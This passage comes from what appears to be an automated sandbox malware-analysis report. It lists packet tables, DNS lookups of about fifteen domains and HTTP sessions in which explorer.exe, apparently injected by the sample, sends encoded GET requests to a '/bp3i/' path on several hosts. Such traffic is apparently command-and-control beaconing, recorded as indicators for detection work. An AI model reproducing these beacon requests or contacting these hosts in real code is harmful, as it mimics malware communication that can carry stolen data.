                                                                                                                  Jun 22, 2021 18:25:23.498655081 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.498703957 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.498946905 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.498977900 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.524998903 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.526283979 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.541776896 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.585988998 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.627732038 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.627933025 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.669863939 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.670067072 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.712395906 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.712451935 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.712490082 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.712666035 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.712698936 CEST4974380192.168.2.5185.53.177.12
                                                                                                                  Jun 22, 2021 18:25:28.754615068 CEST8049743185.53.177.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:33.816914082 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:33.868442059 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:33.868536949 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:33.868663073 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:33.919959068 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:34.017278910 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:34.017316103 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:34.017632961 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:34.017674923 CEST4974680192.168.2.567.199.248.12
                                                                                                                  Jun 22, 2021 18:25:34.069250107 CEST804974667.199.248.12192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.579380035 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:44.760284901 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.760457993 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:44.760615110 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:44.941190004 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.979393005 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.979692936 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:44.980089903 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.980204105 CEST4974980192.168.2.550.87.146.99
                                                                                                                  Jun 22, 2021 18:25:45.160393000 CEST804974950.87.146.99192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.065499067 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:50.296199083 CEST804975023.225.101.32192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.296382904 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:50.296525002 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:50.530720949 CEST804975023.225.101.32192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.531052113 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:50.761837959 CEST804975023.225.101.32192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.761857986 CEST804975023.225.101.32192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:50.762094021 CEST4975080192.168.2.523.225.101.32
                                                                                                                  Jun 22, 2021 18:25:55.638763905 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.695979118 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.696079969 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.696207047 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.754239082 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.754271030 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.754472017 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.754544973 CEST4975180192.168.2.594.136.40.51
                                                                                                                  Jun 22, 2021 18:25:55.811793089 CEST804975194.136.40.51192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:00.855860949 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.056698084 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.056828022 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.057169914 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.257514954 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285360098 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285407066 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:01.285660982 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.286010981 CEST4975280192.168.2.5184.168.131.241
                                                                                                                  Jun 22, 2021 18:26:01.486409903 CEST8049752184.168.131.241192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.386672974 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.429472923 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.429666996 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.429832935 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.474116087 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.571907043 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.571934938 CEST804975334.102.136.180192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.572149992 CEST4975380192.168.2.534.102.136.180
                                                                                                                  Jun 22, 2021 18:26:06.572212934 CEST4975380192.168.2.534.102.136.180

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jun 22, 2021 18:23:54.764163017 CEST6530753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:54.812222958 CEST6434453192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:54.823451996 CEST53653078.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:54.892064095 CEST53643448.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:55.027213097 CEST6206053192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:55.041273117 CEST6180553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:55.094613075 CEST53618058.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:55.095175982 CEST53620608.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:55.235524893 CEST5479553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:55.286159039 CEST53547958.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:55.665152073 CEST4955753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:55.716680050 CEST53495578.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:56.582766056 CEST6173353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:56.640352964 CEST53617338.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:57.512614012 CEST6544753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:57.571700096 CEST53654478.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:57.823247910 CEST5244153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:57.884458065 CEST53524418.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:58.493119001 CEST6217653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:58.545609951 CEST53621768.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:23:59.475248098 CEST5959653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:23:59.531183004 CEST53595968.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:00.639548063 CEST6529653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:00.691658020 CEST53652968.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:01.593386889 CEST6318353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:01.653599977 CEST53631838.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:02.567322016 CEST6015153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:02.619290113 CEST53601518.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:03.765702009 CEST5696953192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:03.819284916 CEST53569698.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:04.694814920 CEST5516153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:04.745690107 CEST53551618.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:05.693505049 CEST5475753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:05.750416040 CEST53547578.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:21.213641882 CEST4999253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:21.274754047 CEST53499928.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:35.263587952 CEST6007553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:35.319888115 CEST53600758.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:24:51.343915939 CEST5501653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:24:51.405790091 CEST53550168.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:05.819411039 CEST6434553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:05.889704943 CEST53643458.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:10.909509897 CEST5712853192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:11.215209961 CEST53571288.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:12.875679016 CEST5479153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:12.937540054 CEST53547918.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:16.629293919 CEST5046353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:17.239247084 CEST53504638.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:21.113866091 CEST5039453192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:21.120426893 CEST5853053192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:21.174793005 CEST53503948.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:21.189177990 CEST53585308.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:21.917556047 CEST5381353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:21.979103088 CEST53538138.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:22.652049065 CEST6373253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:22.720386028 CEST53637328.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:22.827163935 CEST5734453192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:23.177216053 CEST53573448.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.446938992 CEST5445053192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:23.506237030 CEST53544508.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:24.219727993 CEST5926153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:24.281904936 CEST53592618.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:25.119163036 CEST5715153192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:25.182950974 CEST53571518.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:26.132370949 CEST5941353192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:26.194438934 CEST53594138.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:27.594022989 CEST6051653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:27.647409916 CEST53605168.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.505049944 CEST5164953192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:28.584403992 CEST53516498.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:28.982712984 CEST6508653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:29.044420004 CEST53650868.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:29.632641077 CEST5643253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:29.692975044 CEST53564328.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:33.726090908 CEST5292953192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:33.812124968 CEST53529298.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:36.458223104 CEST6431753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:36.520037889 CEST53643178.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:39.055846930 CEST6100453192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:39.366209030 CEST53610048.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:39.867213011 CEST5689553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:39.925975084 CEST53568958.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:44.382913113 CEST6237253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:44.578063011 CEST53623728.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:49.992361069 CEST6151553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:50.063656092 CEST53615158.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:55.564214945 CEST5667553192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:25:55.637794018 CEST53566758.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:00.782303095 CEST5717253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:00.854792118 CEST53571728.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:06.311050892 CEST5526753192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:06.384546041 CEST53552678.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:11.586018085 CEST5096953192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:11.956522942 CEST53509698.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:17.334999084 CEST6436253192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:17.406371117 CEST53643628.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:27.430978060 CEST5476653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:27.493675947 CEST53547668.8.8.8192.168.2.5
                                                                                                                  Jun 22, 2021 18:26:33.086693048 CEST6144653192.168.2.58.8.8.8
                                                                                                                  Jun 22, 2021 18:26:33.159524918 CEST53614468.8.8.8192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                  Jun 22, 2021 18:25:05.819411039 CEST192.168.2.58.8.8.80x3bf8Standard query (0)www.reufhroir.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:10.909509897 CEST192.168.2.58.8.8.80xf2a2Standard query (0)www.purpleqube.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:16.629293919 CEST192.168.2.58.8.8.80x47b1Standard query (0)www.tori2020.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:22.827163935 CEST192.168.2.58.8.8.80x6b10Standard query (0)www.underce.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:28.505049944 CEST192.168.2.58.8.8.80x92eaStandard query (0)www.fredrika-stahl.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:33.726090908 CEST192.168.2.58.8.8.80xa6bfStandard query (0)www.doodstore.netA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:39.055846930 CEST192.168.2.58.8.8.80x732Standard query (0)www.kocaelimanliftkiralama.siteA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:44.382913113 CEST192.168.2.58.8.8.80x2986Standard query (0)www.mutanterestaurante.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:49.992361069 CEST192.168.2.58.8.8.80xf247Standard query (0)www.9wsc.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:55.564214945 CEST192.168.2.58.8.8.80x660Standard query (0)www.5xlsteve.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:00.782303095 CEST192.168.2.58.8.8.80x6b35Standard query (0)www.oceancollaborative.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:06.311050892 CEST192.168.2.58.8.8.80x7360Standard query (0)www.motivactivewear.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:11.586018085 CEST192.168.2.58.8.8.80x4f71Standard query (0)www.grpsexportsandimports.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:17.334999084 CEST192.168.2.58.8.8.80xaa31Standard query (0)www.kesat-ya10.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:27.430978060 CEST192.168.2.58.8.8.80x7483Standard query (0)www.shenghui118.comA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:33.086693048 CEST192.168.2.58.8.8.80x4106Standard query (0)www.reufhroir.comA (IP address)IN (0x0001)

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                  Jun 22, 2021 18:25:05.889704943 CEST8.8.8.8192.168.2.50x3bf8Name error (3)www.reufhroir.comnonenoneA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:11.215209961 CEST8.8.8.8192.168.2.50xf2a2No error (0)www.purpleqube.compurpleqube.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:11.215209961 CEST8.8.8.8192.168.2.50xf2a2No error (0)purpleqube.com119.81.95.146A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:17.239247084 CEST8.8.8.8192.168.2.50x47b1No error (0)www.tori2020.com222.239.248.209A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:23.177216053 CEST8.8.8.8192.168.2.50x6b10No error (0)www.underce.comvallble01.xshoppy.shopCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:23.177216053 CEST8.8.8.8192.168.2.50x6b10No error (0)vallble01.xshoppy.shop75.2.124.199A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:28.584403992 CEST8.8.8.8192.168.2.50x92eaNo error (0)www.fredrika-stahl.com185.53.177.12A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:33.812124968 CEST8.8.8.8192.168.2.50xa6bfNo error (0)www.doodstore.netdoodstore.netCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:33.812124968 CEST8.8.8.8192.168.2.50xa6bfNo error (0)doodstore.net67.199.248.12A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:33.812124968 CEST8.8.8.8192.168.2.50xa6bfNo error (0)doodstore.net67.199.248.13A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:39.366209030 CEST8.8.8.8192.168.2.50x732Server failure (2)www.kocaelimanliftkiralama.sitenonenoneA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:44.578063011 CEST8.8.8.8192.168.2.50x2986No error (0)www.mutanterestaurante.commutanterestaurante.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:44.578063011 CEST8.8.8.8192.168.2.50x2986No error (0)mutanterestaurante.com50.87.146.99A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:50.063656092 CEST8.8.8.8192.168.2.50xf247No error (0)www.9wsc.com23.225.101.32A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:25:55.637794018 CEST8.8.8.8192.168.2.50x660No error (0)www.5xlsteve.com94.136.40.51A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:00.854792118 CEST8.8.8.8192.168.2.50x6b35No error (0)www.oceancollaborative.comoceancollaborative.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:00.854792118 CEST8.8.8.8192.168.2.50x6b35No error (0)oceancollaborative.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:06.384546041 CEST8.8.8.8192.168.2.50x7360No error (0)www.motivactivewear.commotivactivewear.comCNAME (Canonical name)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:06.384546041 CEST8.8.8.8192.168.2.50x7360No error (0)motivactivewear.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:11.956522942 CEST8.8.8.8192.168.2.50x4f71No error (0)www.grpsexportsandimports.com52.74.134.26A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:17.406371117 CEST8.8.8.8192.168.2.50xaa31Name error (3)www.kesat-ya10.comnonenoneA (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:27.493675947 CEST8.8.8.8192.168.2.50x7483No error (0)www.shenghui118.com45.192.104.89A (IP address)IN (0x0001)
                                                                                                                  Jun 22, 2021 18:26:33.159524918 CEST8.8.8.8192.168.2.50x4106Name error (3)www.reufhroir.comnonenoneA (IP address)IN (0x0001)

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • www.purpleqube.com
                                                                                                                  • www.tori2020.com
                                                                                                                  • www.underce.com
                                                                                                                  • www.fredrika-stahl.com
                                                                                                                  • www.doodstore.net
                                                                                                                  • www.mutanterestaurante.com
                                                                                                                  • www.9wsc.com
                                                                                                                  • www.5xlsteve.com
                                                                                                                  • www.oceancollaborative.com
                                                                                                                  • www.motivactivewear.com

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.549726119.81.95.14680C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:11.419150114 CEST1542OUTGET /bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.purpleqube.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:11.619210958 CEST1543INHTTP/1.1 302 Found
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:11 GMT
                                                                                                                  Server: Apache
                                                                                                                  Location: https://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W
                                                                                                                  Content-Length: 308
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 75 72 70 6c 65 71 75 62 65 2e 63 6f 6d 2f 62 70 33 69 2f 3f 32 64 62 3d 49 6b 51 75 43 46 6c 37 4d 43 66 42 52 6a 2f 56 7a 2b 6f 39 53 5a 4b 75 34 7a 51 65 50 2b 35 48 51 4c 78 38 57 55 63 4a 62 65 56 6b 74 45 57 31 39 77 45 64 41 38 45 74 62 6d 72 68 35 31 65 54 44 59 59 4d 26 61 6d 70 3b 41 70 5a 78 3d 4f 32 4d 48 69 56 72 30 57 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&amp;ApZx=O2MHiVr0W">here</a>.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.549732222.239.248.20980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:17.506963015 CEST7114OUTGET /bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.tori2020.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:17.774080992 CEST7115INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:18 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 62 70 33 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /bp3i/ was not found on this server.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.54973775.2.124.19980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:23.221652031 CEST9032OUTGET /bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.underce.com
                                                                                                                  Connection: close
